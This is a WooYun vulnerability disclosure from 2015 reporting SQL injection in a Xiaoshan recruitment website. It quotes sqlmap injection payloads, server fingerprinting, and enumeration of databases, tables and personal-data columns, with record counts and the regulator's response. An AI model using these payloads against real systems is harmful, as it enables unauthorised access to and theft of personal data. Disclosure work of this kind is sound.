当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140138

漏洞标题:萧山人才网注入漏洞(泄露几十万个人信息)

相关厂商:萧山人才网

漏洞作者: 泪雨无魂

提交时间:2015-09-12 12:02

修复时间:2015-10-30 08:14

公开时间:2015-10-30 08:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-12: 细节已通知厂商并且等待厂商处理中
2015-09-15: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-25: 细节向核心白帽子及相关领域专家公开
2015-10-05: 细节向普通白帽子公开
2015-10-15: 细节向实习白帽子公开
2015-10-30: 细节向公众公开

简要描述:

萧山人才网注入漏洞,导致泄露几十万用户的详细个人信息。。。。

详细说明:

注入点:
URL1 http://**.**.**.**/NewsListShow.aspx?Pid=19
URL2 http://**.**.**.**/ShowUnits.aspx?UnitsId=20131007111013404089
直接sqlmap 跑出各种数据。。。
用户信息量:
xshrLog | 2620660 |
ApplyDirJob |625962 |
PersonAssocBase | 249460 |
ApplyDirAddr | 382411 |

sqlmap identified the following injection points with a total of 0 HTTP(s) 
reque
sts:
---
Place: GET
Parameter: Pid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Pid=19) AND 4486=4486 AND (1494=1494
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: Pid=-6717) UNION ALL SELECT 32,32,32,32,CHAR(58) CHAR(117) 
CHAR(99)
 CHAR(100) CHAR(58) CHAR(112) CHAR(86) CHAR(89) CHAR(68) CHAR(116) CHAR
(114) CHA
R(77) CHAR(119) CHAR(76) CHAR(98) CHAR(58) CHAR(115) CHAR(110) CHAR(107) 
CHAR(58
),32,32,32,32,32--
---
[22:48:06] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[22:48:17] [INFO] retrieved: 10
[22:48:21] [INFO] retrieved: master
[22:48:40] [INFO] retrieved: model
[22:48:56] [INFO] retrieved: msdb
[22:49:10] [INFO] retrieved:Northwind
[22:50:00] [INFO] retrieved: pubs
[22:50:13] [INFO] retrieved: Rcpq_xshr
[22:50:41] [INFO] retrieved: tempdb
[22:51:00] [INFO] retrieved: xshr2007
[22:51:25] [INFO] retrieved: xshrBosom
[22:51:53] [INFO] retrieved: xsksDB_2014
available databases [10]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] Rcpq_xshr
[*] tempdb
[*] xshr2007
[*] xshrBosom
[*] xsksDB_2014
current database:    'xshr2007'
current user:    'xsrcsc2014Speed'


6.png


33.png


77.png


漏洞证明:

Database: xshr2007
[167 tables]
+-------------------------+
| Ad_gdgg                 |
| ApplyDirAddr            |
| ApplyDirBase            |
| ApplyDirJob             |
| ApplySearch             |
| ApplyTbl                |
| ArtClass                |
| ArtTemp                 |
| ArtTemplate             |
| Article                 |
| CertProcess             |
| ComUser                 |
| CompSeePerson           |
| CompTemplate            |
| CompanyAssocAppend      |
| CompanyAssocBase        |
| CompanyAssocParam       |
| CompanyLimit            |
| CompanyMenu             |
| CompanyNews             |
| CompanyProduct          |
| EducationProcess        |
| ElitePersonToJob        |
| EmailArticle            |
| ExamScore               |
| FamilyMemProcess        |
| Favorite                |
| FileSearch              |
| HTML_Address            |
| HTML_AppearType         |
| HTML_ApplyState         |
| HTML_Article            |
| HTML_AssocState         |
| HTML_AssocTerm          |
| HTML_AssocType          |
| HTML_CertType           |
| HTML_CompCharacter      |
| HTML_CompTempType       |
| HTML_CompanyAssocType   |
| HTML_Degree             |
| HTML_DriveState         |
| HTML_EliteWork          |
| HTML_HealthState        |
| HTML_JobCallType        |
| HTML_JobCharacter       |
| HTML_JobState           |
| HTML_JobTerm            |
| HTML_JobType            |
| HTML_KnowType           |
| HTML_Language           |
| HTML_LessonType         |
| HTML_ManageType         |
| HTML_MarrState          |
| HTML_Nation             |
| HTML_PaymentTerm        |
| HTML_PersonAssocType    |
| HTML_PolityType         |
| HTML_ReqJobState        |
| HTML_ReqJobType         |
| HTML_SalaryReq          |
| HTML_SalaryType         |
| HTML_SchoolAssocType    |
| HTML_SchoolLevel        |
| HTML_SecrecyType        |
| HTML_Specialty          |
| HTML_TitleColor         |
| HTML_TitleWord          |
| HTML_TrainAssocType     |
| HTML_WorkState          |
| HoldSkill               |
| HrArticle               |
| HrClass                 |
| HrJb                    |
| HrMenber                |
| Html_Booth              |
| Html_BoothState         |
| Html_CreateState        |
| Html_PayState           |
| Html_Place              |
| Html_SiteState          |
| InterviewLetter         |
| Ip                      |
| Job                     |
| JxCompany               |
| JxJob                   |
| JxPerson                |
| LanguageAbility         |
| LessonReport            |
| ManageLimit             |
| MatchJob                |
| MatchJobSoon            |
| NetworkSign             |
| News                    |
| NewsClass               |
| Online                  |
| OnlineRequest           |
| Party_ArticleData       |
| Party_Color             |
| Party_Min               |
| Party_Type              |
| Party_Word              |
| PaymentType             |
| PerBazaar               |
| PersonAssocAppend       |
| PersonAssocBase         |
| PersonAssocParam        |
| PersonLimit             |
| PersonMenu              |
| PracticeProcess         |
| RegAssoc                |
| ReqAssoc                |
| ReqCompanyData          |
| ReqJob                  |
| RollArticle             |
| SchoolAssocAppend       |
| SchoolAssocBase         |
| SchoolAssocParam        |
| SchoolLimit             |
| SchoolMenu              |
| Screen                  |
| SearchPerson            |
| Seeker                  |
| SendToEmail             |
| SiteEnlist              |
| SiteInfo                |
| SiteJobs                |
| SolicitArtClass         |
| SolicitArticle          |
| SoonAssocData           |
| SoonAssocPayHistory     |
| SoonAssocSeeRecord      |
| SpecClass               |
| SpeedManage             |
| StudentReg              |
| SuccessProcess          |
| SysRcgc                 |
| SystemInfo              |
| SystemMenu              |
| SystemNote              |
| Temp_PersonResumeOfSend |
| ToxshrMessage           |
| TrainAndJob             |
| TrainAssocAppend        |
| TrainAssocBase          |
| TrainAssocParam         |
| TrainLesson             |
| TrainLimit              |
| TrainMenu               |
| TrainProcess            |
| TrainRequest            |
| UnitsInternal           |
| UnitsVideo              |
| UpFileOfArt             |
| VideoApplyData          |
| VideoApplySearch        |
| VideoData               |
| VideoJob                |
| WorkProcess             |
| XshrDoorManage          |
| data                    |
| dtproperties            |
| idea                    |
| person                  |
| sysconstraints          |
| syssegments             |
| tb_person               |
| xshrLog                 |
+-------------------------+
Database: xshr2007
Table: Job
[31 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| AddrId       | int      |
| AppearTypeId | int      |
| AssocId      | varchar  |
| ComUserId    | int      |
| DegreeId     | int      |
| JobAgeEnd    | int      |
| JobAgeStart  | int      |
| JobCharId    | int      |
| JobClick     | int      |
| JobDelete    | int      |
| JobDesc      | varchar  |
| JobEmpCount  | varchar  |
| JobExam      | varchar  |
| JobGetMoney  | varchar  |
| JobId        | int      |
| JobLangReq   | varchar  |
| JobName      | varchar  |
| JobOrderTime | datetime |
| JobOtherReq  | varchar  |
| JobPubTime   | datetime |
| JobSalary    | varchar  |
| JobSex       | int      |
| JobStateId   | int      |
| JobTermId    | int      |
| JobTop       | int      |
| JobTopTime   | datetime |
| JobTreat     | varchar  |
| JobTypeId    | int      |
| LangId       | int      |
| MatchKey     | varchar  |
| WorkStateId  | int      |
+--------------+----------+
Database: xshr2007
Table: PersonAssocBase
[24 columns]
+-----------------+---------+
| Column          | Type    |
+-----------------+---------+
| AddrId          | int     |
| AssocId         | varchar |
| CertTypeId      | int     |
| DriveStateId    | int     |
| EliteWorkID     | int     |
| HealthStateId   | int     |
| MarrStateId     | int     |
| NationId        | int     |
| PerAddr         | varchar |
| PerBirthday     | varchar |
| PerCertNumber   | varchar |
| perGradeCertNum | varchar |
| PerHandset      | varchar |
| PerHasHouse     | bit     |
| PerHeight       | int     |
| PerPhoto        | varchar |
| PerPost         | varchar |
| PerQQ           | varchar |
| PerRealName     | varchar |
| PerSex          | bit     |
| PerTel          | varchar |
| PerWeb          | varchar |
| PerWeight       | int     |
| PolityTypeId    | int     |
+-----------------+---------+


434.png


6.png


77.png


友情检测,不搞破坏。。。

修复方案:

你懂的。。。

版权声明:转载请注明来源 泪雨无魂@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-15 08:12

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置。

最新状态:

暂无